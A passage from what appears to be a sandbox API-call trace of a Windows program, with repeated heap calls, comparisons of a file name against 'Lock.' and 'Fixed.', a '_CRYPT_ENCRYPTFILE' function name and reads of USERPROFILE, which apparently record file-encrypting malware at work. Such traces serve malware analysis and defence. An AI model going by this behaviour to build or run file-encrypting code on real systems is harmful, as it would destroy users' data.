lpString2="Lock.", cchCount2=5) returned 1 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rnfbris-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nfbris-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fbris-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bris-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ris-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="is-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="219Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="19Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0250.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0250.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0250.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0250.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0250.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0250.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0250.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0250.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0250.911] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0250.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0250.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0250.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0250.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0250.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0250.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0250.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NU6pYHrnfbris-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U6pYHrnfbris-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6pYHrnfbris-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pYHrnfbris-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHrnfbris-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hrnfbris-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rnfbris-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nfbris-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fbris-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bris-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ris-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="is-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="219Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="19Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0250.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0250.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0250.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0250.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0250.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0250.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0250.913] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.913] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0250.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0250.913] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0250.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0250.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0250.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0250.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0250.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0250.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0250.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d88 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0250.914] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0250.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0250.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0250.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0250.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0250.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0250.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0250.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0250.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0250.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d28 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0250.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0250.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0250.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0250.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0250.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0250.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0250.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0250.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0250.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0250.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0250.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0250.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0250.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0250.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0250.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0250.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0250.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0250.919] HeapFree (in: 